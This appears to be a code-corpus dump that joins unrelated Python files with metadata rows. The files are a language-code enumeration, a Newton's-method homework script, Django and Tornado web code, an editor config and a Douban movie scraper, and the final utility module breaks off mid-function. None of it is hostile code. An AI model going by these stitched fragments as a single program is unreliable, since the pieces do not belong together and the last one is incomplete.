LanguageCode.ab = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ab', tag='ab')
LanguageCode.ae = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ae', tag='ae')
LanguageCode.af = LanguageCode._CF_enumeration.addEnumeration(unicode_value='af', tag='af')
LanguageCode.ak = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ak', tag='ak')
LanguageCode.am = LanguageCode._CF_enumeration.addEnumeration(unicode_value='am', tag='am')
LanguageCode.an = LanguageCode._CF_enumeration.addEnumeration(unicode_value='an', tag='an')
LanguageCode.ar = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ar', tag='ar')
LanguageCode.as_ = LanguageCode._CF_enumeration.addEnumeration(unicode_value='as', tag='as_')
LanguageCode.av = LanguageCode._CF_enumeration.addEnumeration(unicode_value='av', tag='av')
LanguageCode.ay = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ay', tag='ay')
LanguageCode.az = LanguageCode._CF_enumeration.addEnumeration(unicode_value='az', tag='az')
LanguageCode.ba = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ba', tag='ba')
LanguageCode.be = LanguageCode._CF_enumeration.addEnumeration(unicode_value='be', tag='be')
LanguageCode.bg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bg', tag='bg')
LanguageCode.bh = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bh', tag='bh')
LanguageCode.bi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bi', tag='bi')
LanguageCode.bm = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bm', tag='bm')
LanguageCode.bn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bn', tag='bn')
LanguageCode.bo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bo', tag='bo')
LanguageCode.br = LanguageCode._CF_enumeration.addEnumeration(unicode_value='br', tag='br')
LanguageCode.bs = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bs', tag='bs')
LanguageCode.ca = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ca', tag='ca')
LanguageCode.ce = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ce', tag='ce')
LanguageCode.ch = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ch', tag='ch')
LanguageCode.co = LanguageCode._CF_enumeration.addEnumeration(unicode_value='co', tag='co')
LanguageCode.cr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='cr', tag='cr')
LanguageCode.cs = LanguageCode._CF_enumeration.addEnumeration(unicode_value='cs', tag='cs')
LanguageCode.cu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='cu', tag='cu')
LanguageCode.cv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='cv', tag='cv')
LanguageCode.cy = LanguageCode._CF_enumeration.addEnumeration(unicode_value='cy', tag='cy')
LanguageCode.da = LanguageCode._CF_enumeration.addEnumeration(unicode_value='da', tag='da')
LanguageCode.de = LanguageCode._CF_enumeration.addEnumeration(unicode_value='de', tag='de')
LanguageCode.dv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='dv', tag='dv')
LanguageCode.dz = LanguageCode._CF_enumeration.addEnumeration(unicode_value='dz', tag='dz')
LanguageCode.ee = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ee', tag='ee')
LanguageCode.el = LanguageCode._CF_enumeration.addEnumeration(unicode_value='el', tag='el')
LanguageCode.en = LanguageCode._CF_enumeration.addEnumeration(unicode_value='en', tag='en')
LanguageCode.eo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='eo', tag='eo')
LanguageCode.es = LanguageCode._CF_enumeration.addEnumeration(unicode_value='es', tag='es')
LanguageCode.et = LanguageCode._CF_enumeration.addEnumeration(unicode_value='et', tag='et')
LanguageCode.eu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='eu', tag='eu')
LanguageCode.fa = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fa', tag='fa')
LanguageCode.ff = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ff', tag='ff')
LanguageCode.fi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fi', tag='fi')
LanguageCode.fj = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fj', tag='fj')
LanguageCode.fo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fo', tag='fo')
LanguageCode.fr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fr', tag='fr')
LanguageCode.fy = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fy', tag='fy')
LanguageCode.ga = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ga', tag='ga')
LanguageCode.gd = LanguageCode._CF_enumeration.addEnumeration(unicode_value='gd', tag='gd')
LanguageCode.gl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='gl', tag='gl')
LanguageCode.gn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='gn', tag='gn')
LanguageCode.gu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='gu', tag='gu')
LanguageCode.gv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='gv', tag='gv')
LanguageCode.ha = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ha', tag='ha')
LanguageCode.he = LanguageCode._CF_enumeration.addEnumeration(unicode_value='he', tag='he')
LanguageCode.hi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='hi', tag='hi')
LanguageCode.ho = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ho', tag='ho')
LanguageCode.hr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='hr', tag='hr')
LanguageCode.ht = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ht', tag='ht')
LanguageCode.hu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='hu', tag='hu')
LanguageCode.hy = LanguageCode._CF_enumeration.addEnumeration(unicode_value='hy', tag='hy')
LanguageCode.hz = LanguageCode._CF_enumeration.addEnumeration(unicode_value='hz', tag='hz')
LanguageCode.ia = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ia', tag='ia')
LanguageCode.id = LanguageCode._CF_enumeration.addEnumeration(unicode_value='id', tag='id')
LanguageCode.ie = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ie', tag='ie')
LanguageCode.ig = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ig', tag='ig')
LanguageCode.ii = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ii', tag='ii')
LanguageCode.ik = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ik', tag='ik')
LanguageCode.io = LanguageCode._CF_enumeration.addEnumeration(unicode_value='io', tag='io')
LanguageCode.is_ = LanguageCode._CF_enumeration.addEnumeration(unicode_value='is', tag='is_')
LanguageCode.it = LanguageCode._CF_enumeration.addEnumeration(unicode_value='it', tag='it')
LanguageCode.iu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='iu', tag='iu')
LanguageCode.ja = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ja', tag='ja')
LanguageCode.jv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='jv', tag='jv')
LanguageCode.ka = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ka', tag='ka')
LanguageCode.kg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kg', tag='kg')
LanguageCode.ki = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ki', tag='ki')
LanguageCode.kj = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kj', tag='kj')
LanguageCode.kk = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kk', tag='kk')
LanguageCode.kl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kl', tag='kl')
LanguageCode.km = LanguageCode._CF_enumeration.addEnumeration(unicode_value='km', tag='km')
LanguageCode.kn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kn', tag='kn')
LanguageCode.ko = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ko', tag='ko')
LanguageCode.kr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kr', tag='kr')
LanguageCode.ks = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ks', tag='ks')
LanguageCode.ku = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ku', tag='ku')
LanguageCode.kv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kv', tag='kv')
LanguageCode.kw = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kw', tag='kw')
LanguageCode.ky = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ky', tag='ky')
LanguageCode.la = LanguageCode._CF_enumeration.addEnumeration(unicode_value='la', tag='la')
LanguageCode.lb = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lb', tag='lb')
LanguageCode.lg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lg', tag='lg')
LanguageCode.li = LanguageCode._CF_enumeration.addEnumeration(unicode_value='li', tag='li')
LanguageCode.ln = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ln', tag='ln')
LanguageCode.lo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lo', tag='lo')
LanguageCode.lt = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lt', tag='lt')
LanguageCode.lu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lu', tag='lu')
LanguageCode.lv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lv', tag='lv')
LanguageCode.mg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mg', tag='mg')
LanguageCode.mh = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mh', tag='mh')
LanguageCode.mi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mi', tag='mi')
LanguageCode.mk = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mk', tag='mk')
LanguageCode.ml = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ml', tag='ml')
LanguageCode.mn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mn', tag='mn')
LanguageCode.mo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mo', tag='mo')
LanguageCode.mr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mr', tag='mr')
LanguageCode.ms = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ms', tag='ms')
LanguageCode.mt = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mt', tag='mt')
LanguageCode.my = LanguageCode._CF_enumeration.addEnumeration(unicode_value='my', tag='my')
LanguageCode.na = LanguageCode._CF_enumeration.addEnumeration(unicode_value='na', tag='na')
LanguageCode.nb = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nb', tag='nb')
LanguageCode.nd = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nd', tag='nd')
LanguageCode.ne = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ne', tag='ne')
LanguageCode.ng = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ng', tag='ng')
LanguageCode.nl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nl', tag='nl')
LanguageCode.nn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nn', tag='nn')
LanguageCode.no = LanguageCode._CF_enumeration.addEnumeration(unicode_value='no', tag='no')
LanguageCode.nr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nr', tag='nr')
LanguageCode.nv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nv', tag='nv')
LanguageCode.ny = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ny', tag='ny')
LanguageCode.oc = LanguageCode._CF_enumeration.addEnumeration(unicode_value='oc', tag='oc')
LanguageCode.oj = LanguageCode._CF_enumeration.addEnumeration(unicode_value='oj', tag='oj')
LanguageCode.om = LanguageCode._CF_enumeration.addEnumeration(unicode_value='om', tag='om')
LanguageCode.or_ = LanguageCode._CF_enumeration.addEnumeration(unicode_value='or', tag='or_')
LanguageCode.os = LanguageCode._CF_enumeration.addEnumeration(unicode_value='os', tag='os')
LanguageCode.pa = LanguageCode._CF_enumeration.addEnumeration(unicode_value='pa', tag='pa')
LanguageCode.pi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='pi', tag='pi')
LanguageCode.pl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='pl', tag='pl')
LanguageCode.ps = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ps', tag='ps')
LanguageCode.pt = LanguageCode._CF_enumeration.addEnumeration(unicode_value='pt', tag='pt')
LanguageCode.qu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='qu', tag='qu')
LanguageCode.rm = LanguageCode._CF_enumeration.addEnumeration(unicode_value='rm', tag='rm')
LanguageCode.rn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='rn', tag='rn')
LanguageCode.ro = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ro', tag='ro')
LanguageCode.ru = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ru', tag='ru')
LanguageCode.rw = LanguageCode._CF_enumeration.addEnumeration(unicode_value='rw', tag='rw')
LanguageCode.sa = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sa', tag='sa')
LanguageCode.sc = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sc', tag='sc')
LanguageCode.sd = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sd', tag='sd')
LanguageCode.se = LanguageCode._CF_enumeration.addEnumeration(unicode_value='se', tag='se')
LanguageCode.sg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sg', tag='sg')
LanguageCode.si = LanguageCode._CF_enumeration.addEnumeration(unicode_value='si', tag='si')
LanguageCode.sk = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sk', tag='sk')
LanguageCode.sl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sl', tag='sl')
LanguageCode.sm = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sm', tag='sm')
LanguageCode.sn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sn', tag='sn')
LanguageCode.so = LanguageCode._CF_enumeration.addEnumeration(unicode_value='so', tag='so')
LanguageCode.sq = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sq', tag='sq')
LanguageCode.sr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sr', tag='sr')
LanguageCode.ss = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ss', tag='ss')
LanguageCode.st = LanguageCode._CF_enumeration.addEnumeration(unicode_value='st', tag='st')
LanguageCode.su = LanguageCode._CF_enumeration.addEnumeration(unicode_value='su', tag='su')
LanguageCode.sv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sv', tag='sv')
LanguageCode.sw = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sw', tag='sw')
LanguageCode.ta = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ta', tag='ta')
LanguageCode.te = LanguageCode._CF_enumeration.addEnumeration(unicode_value='te', tag='te')
LanguageCode.tg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tg', tag='tg')
LanguageCode.th = LanguageCode._CF_enumeration.addEnumeration(unicode_value='th', tag='th')
LanguageCode.ti = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ti', tag='ti')
LanguageCode.tk = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tk', tag='tk')
LanguageCode.tl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tl', tag='tl')
LanguageCode.tn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tn', tag='tn')
LanguageCode.to = LanguageCode._CF_enumeration.addEnumeration(unicode_value='to', tag='to')
LanguageCode.tr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tr', tag='tr')
LanguageCode.ts = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ts', tag='ts')
LanguageCode.tt = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tt', tag='tt')
LanguageCode.tw = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tw', tag='tw')
LanguageCode.ty = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ty', tag='ty')
LanguageCode.ug = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ug', tag='ug')
LanguageCode.uk = LanguageCode._CF_enumeration.addEnumeration(unicode_value='uk', tag='uk')
LanguageCode.ur = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ur', tag='ur')
LanguageCode.uz = LanguageCode._CF_enumeration.addEnumeration(unicode_value='uz', tag='uz')
LanguageCode.ve = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ve', tag='ve')
LanguageCode.vi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='vi', tag='vi')
LanguageCode.vo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='vo', tag='vo')
LanguageCode.wa = LanguageCode._CF_enumeration.addEnumeration(unicode_value='wa', tag='wa')
LanguageCode.wo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='wo', tag='wo')
LanguageCode.xh = LanguageCode._CF_enumeration.addEnumeration(unicode_value='xh', tag='xh')
LanguageCode.yi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='yi', tag='yi')
LanguageCode.yo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='yo', tag='yo')
LanguageCode.za = LanguageCode._CF_enumeration.addEnumeration(unicode_value='za', tag='za')
LanguageCode.zh = LanguageCode._CF_enumeration.addEnumeration(unicode_value='zh', tag='zh')
LanguageCode.zu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='zu', tag='zu')
LanguageCode._InitializeFacetMap(LanguageCode._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'LanguageCode', LanguageCode)
| [
"cyprien@trax-air.com"
] | cyprien@trax-air.com |
4d584e485a3f78a66bcd0ef4343df4bf33fdb29f | f059a704022b447f166aaee9648a9edd2326bbd3 | /hw1.py | e831e69ae8d9043604fe80d93bd6c3916536102c | [] | no_license | cheecheelin/PIC97-HW1 | 55c27760c88ac8055a05f515b33023c71c156309 | 717b08e9625ce638bea07b73441fa84d857c4a58 | refs/heads/master | 2021-01-10T13:32:37.061950 | 2016-01-08T01:38:00 | 2016-01-08T01:38:00 | 49,236,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | #!/usr/bin/python
#Cheechee Lin PIC 97 HW 1 01/07/2016
#Newton's Method for given test cases
import math
#hardcoded functions and their derivatives
def f(x):
return x**2-1
def df(x):
return (2*x)
def g(x):
return math.sin(x)
def dg(x):
return math.cos(x)
def h(x):
return math.log1p(x-1)-1
def dh(x):
return 1/x
#Newton's Method
def newton(func,dfunc,x,eps):
xi=x
#if magnitude of residual error is less than or equal to eps then done, else calculate correction to guess
while math.fabs(func(xi))>eps:
xi= xi-float(func(xi)/dfunc(xi))
return xi
print newton(f,df,3,0.0001)
print newton (f,df,-0.5,0.0001)
print newton (g,dg,2,0.0001)
print newton (h,dh,1.5,0.0001) | [
"cheecheelin@s-169-232-112-198.resnet.ucla.edu"
] | cheecheelin@s-169-232-112-198.resnet.ucla.edu |
00e61e3359148ae5195cff96ee8a1f87917fa3ba | 6f05f7d5a67b6bb87956a22b988067ec772ba966 | /data/test/python/e0a24819976e888969becc8f9ec8d2f0e7e377efurls.py | e0a24819976e888969becc8f9ec8d2f0e7e377ef | [
"MIT"
] | permissive | harshp8l/deep-learning-lang-detection | 93b6d24a38081597c610ecf9b1f3b92c7d669be5 | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | refs/heads/master | 2020-04-07T18:07:00.697994 | 2018-11-29T23:21:23 | 2018-11-29T23:21:23 | 158,597,498 | 0 | 0 | MIT | 2018-11-21T19:36:42 | 2018-11-21T19:36:41 | null | UTF-8 | Python | false | false | 591 | py | #coding:utf-8
from controller.index import Index
from controller.article import Article
from controller.signin import Signin
from controller.write import Write
from controller.signout import Signout
from controller.page import About,Type
from controller.api import Article as ART,Comment as com
urls = [
#首页
(r'/', Index),
#文章
(r'/article/([^\n]*)',Article),
#登录
(r'/signin',Signin),
#发表
(r'/write',Write),
#API文章
(r'/api/article/([^\n]*)',ART),
(r'/api/comment',com),
#退出
(r'/signout',Signout),
#关于
(r'/about',About),
# 分类
(r'/type',Type)
] | [
"aliostad+github@gmail.com"
] | aliostad+github@gmail.com |
9f75ae87e95dc57ac67393197c8c4f72c083c8d7 | bf634c1048818482108630b6e88cd1c36fd2051e | /pages/views.py | 33ef90efc6ff1239fb73e01f62927fb02ece2064 | [] | no_license | ssandhu2/real-estate | c1679a079f2a9ca49674f292cbd038e69ea4da35 | 6d0122ebc749e58534b18a3b3ebdef1ac08ac7f7 | refs/heads/master | 2022-09-16T21:52:29.474119 | 2020-06-02T22:17:19 | 2020-06-02T22:17:19 | 267,181,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 869 | py | from django.shortcuts import render
from django.http import HttpResponse
from listings.choices import price_choices, bedroom_choices, state_choices
from listings.models import Listing
from realtors.models import Realtor
# Create your views here.
def index(request):
listings = Listing.objects.order_by('-list_date').filter(is_published= True)[:3]
context= {
'listings': listings,
'state_choices': state_choices,
'bedroom_choices': bedroom_choices,
'price_choices': price_choices
}
return render(request, 'pages/index.html', context)
def about(request):
realtors = Realtor.objects.order_by('-hire_date')
mvp_realtors = Realtor.objects.all().filter(is_mvp=True)
context = {
'realtors': realtors,
'mvp_realtors': mvp_realtors
}
return render(request, 'pages/about.html', context)
| [
"ssandhu2@mail.sfsu.edu"
] | ssandhu2@mail.sfsu.edu |
0409a469c17ce694cb44bf0103a68ba43fa98d38 | edd8d9a157b4d1235f6ff38c62023e451af3699e | /.ycm_extra_conf.py | 80cd16046c020fe24d6788715d2927767a1b6ea4 | [
"BSD-3-Clause"
] | permissive | Magnutic/mg-engine | 34ff93669df3d62aff42d76513886c137dfa0620 | 3078c7248f86e637dc306dd3c9cf8496918219cc | refs/heads/master | 2023-03-08T16:22:57.564915 | 2023-02-23T20:03:09 | 2023-02-23T20:03:09 | 152,069,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | import os
flags = [
'-Wall',
'-Wextra',
'-Wdeprecated',
'-Wshadow',
'-Wnon-virtual-dtor',
'-Wconversion',
'-std=c++20',
'-x', 'c++',
'-I', './external/mg_dependencies/include',
'-I', './external/mg_dependencies/include/bullet',
'-I', './external/mg_dependencies/function2/include',
'-I', './external/mg_dependencies/optional/include',
'-I', './external/mg_dependencies/plf_colony',
'-I', './external/mg_dependencies/stb',
'-I', './external/mg_dependencies/imgui',
'-I', './external/mg_dependencies/utf8.h',
'-I', './external/glad/include',
'-I', './include',
'-I', './src',
'-I', './build/deps/include',
'-isystem', '/usr/local/include',
'-DGLM_FORCE_XYZW_ONLY=1'
]
def DirectoryOfThisScript():
return os.path.dirname(os.path.abspath(__file__))
def Settings(filename, **kwargs ):
return {
'flags': flags,
'include_paths_relative_to_dir': DirectoryOfThisScript()
}
| [
"magnus@magnutic.se"
] | magnus@magnutic.se |
8c2f1bde7ab7e0d2f103fb80187f0bda6d09a429 | c453bd099dc332aac92ef03d8c18eaed894c3f81 | /bb_Implementation/Implementation_2.py | 5fcde98e3520276606e6f3a31c71c1f4acd2446e | [] | no_license | taegyoo1104/Study_For_Algo_Python | 562925c39df9931adc8559832895da189b7b3c0b | 39ec21c73b5d8382b2ad2d43f51c2857ae5de68d | refs/heads/master | 2023-08-18T16:25:07.875513 | 2021-10-10T15:37:41 | 2021-10-10T15:37:41 | 363,493,234 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | datas = input()
result = []
value = 0
for data in datas:
if data.isalpha():
result.append(data)
else:
value += int(data)
if value == 0:
print(''.join(result))
else:
result.append(str(value))
print(''.join(result)) | [
"taegyoo1104@gmail.com"
] | taegyoo1104@gmail.com |
9fc32ab67edcc463d7d73686dd60e399151ee4ec | 5d80aa8893a5d76e45bc674c6f2c5009521197d2 | /eshop/views.py | 90229e3bc1b9e10781d316339e4003912e0b6727 | [] | no_license | belAnosovAs/prostie-zakupki | f42af9289c776b685f37f3f2555c2e911e59d251 | 5fd0b994eca6ef5bce445de6cbaefcc73e35f68a | refs/heads/master | 2016-09-10T12:27:58.235920 | 2012-03-15T12:04:27 | 2012-03-15T12:04:27 | 3,645,967 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | from django.shortcuts import render_to_response
from first_site.eshop.models import *
def purchase_type_list(request):
type_list = PurchaseType.objects.all()
return render_to_response('purchase_type_list.html', {'type_list':type_list})
def purchase_list(request, purchase_type, category_id):
try:
category_id = int(category_id)
except ValueError:
category_id = 0
#raise Http404()
try:
purchase_type = int(purchase_type)
except ValueError:
purchase_type = 0
#raise Http404()
purchase_list = Purchase.objects.filter(type=purchase_type, category=category_id)
try:
purchase_type=PurchaseType.objects.get(id=purchase_type)
except PurchaseType.DoesNotExist:
purchase_type=None
try:
category=Category.objects.get(id=category_id)
except Category.DoesNotExist:
category=None
return render_to_response('purchase_list.html', {'purchase_type':purchase_type, 'purchase_list':purchase_list})
def purchase_detail(request, purchase_id):
try:
purchase_id = int(purchase_id)
except ValueError:
purchase_id=0
product_list = Product.objects.filter(purchase=purchase_id)
try:
purchase=Purchase.objects.get(id=purchase_id)
except Purchase.DoesNotExist:
purchase=None
return render_to_response('purchase_detail.html', {'purchase':purchase, 'product_list':product_list})
def product_detail(request, product_id):
try:
product_id = int(product_id)
except ValueError:
purchase_id=0
try:
product=Product.objects.get(id=product_id)
except Product.DoesNotExist:
product=None
return render_to_response('product_detail.html', {'product':product}) | [
"belAnosovAS@gmail.com"
] | belAnosovAS@gmail.com |
35ee7b5437dd10190f3ee588717aa50e422987a6 | 9c3cfbb186d23c698a112ecfdd2ab51032b0a9ff | /app/migrations/0016_auto_20210614_2320.py | 00c65fbcabee348a95fa5a797fc6285f61729e78 | [] | no_license | Sadiq290/TMC | e712d3b378399b8baf458187777a1c25a8f8fd2c | ee185285344faec0b83f13a5f43cb61d9e1bc029 | refs/heads/main | 2023-08-07T23:57:44.361324 | 2021-09-27T17:13:30 | 2021-09-27T17:13:30 | 410,975,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | # Generated by Django 3.1 on 2021-06-14 17:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0015_camptrainer'),
]
operations = [
migrations.RenameField(
model_name='camptrainer',
old_name='institutuion',
new_name='instituion',
),
]
| [
"sadiqmumu27@gmail.com"
] | sadiqmumu27@gmail.com |
dff2bc6e08afd2c6e14c4104a8b8783faf22be45 | 20da9b6b01d985646fd1b1753f312001a55e1e37 | /data-visualize-chain/spider/getDetails.py | 5d3f91b28a2ca80076f90005083e11f0490d47eb | [] | no_license | JessiZhu/starwar-visualization | 27aa01f74021e8dfd9c5534ebeb888e9015c4ff4 | f373c2e6afc9e11859f3dc285058cd4b512f5212 | refs/heads/master | 2020-05-16T05:03:21.022776 | 2019-04-22T15:17:06 | 2019-04-22T15:17:06 | 182,800,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,330 | py |
import urllib
import urllib.request
from bs4 import BeautifulSoup
fr = open('douban_movie.txt','r' , encoding='utf8')
fw = open('douban_movie_detail.txt' , 'w' ,encoding='utf8')
fw.write('id^title^url^cover^rate^director^composer^actor^category^district^language^showtime^length^othername^description\n')
count = 1
firstline = True
for line in fr:
if firstline:
firstline = False
continue
line = line.split(';')
movieId = line[0]
title = line[1]
url = line[2]
cover = line[3]
rate = line[4].rstrip('\n')
response = urllib.request.urlopen(url=url)
html = response.read()
html = BeautifulSoup(html , 'html.parser')
info = html.select('#info')[0]
info = info.get_text().split('\n')
print(str(count) + ' '+ str(len(info)) + ' '+ title)
# for item in info:
# print(item)
if len(info) == 13:
director = info[1].split(':')[-1].strip()
composer = info[2].split(':')[-1].strip()
actor = info[3].split(':')[-1].strip()
category = info[4].split(':')[-1].strip()
district = info[6].split(':')[-1].strip()
language = info[7].split(':')[-1].strip()
showtime = info[8].split(':')[-1].strip()
length = info[9].split(':')[-1].strip()
othername = info[10].split(':')[-1].strip()
elif len(info) == 12:
director = info[1].split(':')[-1].strip()
composer = info[2].split(':')[-1].strip()
actor = info[3].split(':')[-1].strip()
category = info[4].split(':')[-1].strip()
district = info[5].split(':')[-1].strip()
language = info[6].split(':')[-1].strip()
showtime = info[7].split(':')[-1].strip()
length = info[8].split(':')[-1].strip()
othername = info[9].split(':')[-1].strip()
else:
continue
description = html.find_all('span' , attrs={"property": "v:summary"})[0].get_text().strip()
description = description.lstrip().lstrip('\n\t').rstrip().rstrip('\n\t').replace('\n', '\t')
record = str(movieId) +'^'+ title +'^'+ url +'^'+ cover +'^'+ str(rate) +'^'+ director +'^'+ composer +'^'+ actor +'^'+ category +'^'+ district +'^'+ language +'^'+ str(showtime) +'^'+ str(length) +'^'+ othername +'^'+ description+'\n'
fw.write(record)
count = count + 1
fr.close()
fw.close()
| [
"417734353@qq.com"
] | 417734353@qq.com |
fbe4700581083d0d46fa73f4777bfc8b5233070f | 4efda3f2eba778d083a7c34d6fdbad8665b91bb0 | /morphonets/utils.py | c0f80e35780d7a44abd37185b024792c709c8321 | [] | no_license | SigmaQuan/morphonet | d615356e7f99b0483d90adfe67e026aa3898c27d | 6dc8653f5b433bb3d981223e966931e087abb784 | refs/heads/master | 2021-05-12T07:39:30.967582 | 2018-01-12T14:38:00 | 2018-01-12T14:38:00 | 114,373,833 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,023 | py | # -*- coding: utf-8 -*-
"""
Help classes and functions.
"""
import numpy as np
import random
import time
# from keras.callbacks import Callback
# from math import exp
# import matplotlib.pyplot as plt
# import numpy as np
# from keras import losses
# from keras import backend as K
def initialize_random_seed():
seed = int(time.time())
np.random.seed(seed)
random.seed(seed)
def generate_random_binomial_(row, col):
return np.random.binomial(
1, 0.5, (row, col)).astype(np.uint8)
def check_contain_chinese(check_str):
for ch in check_str.decode('utf-8'):
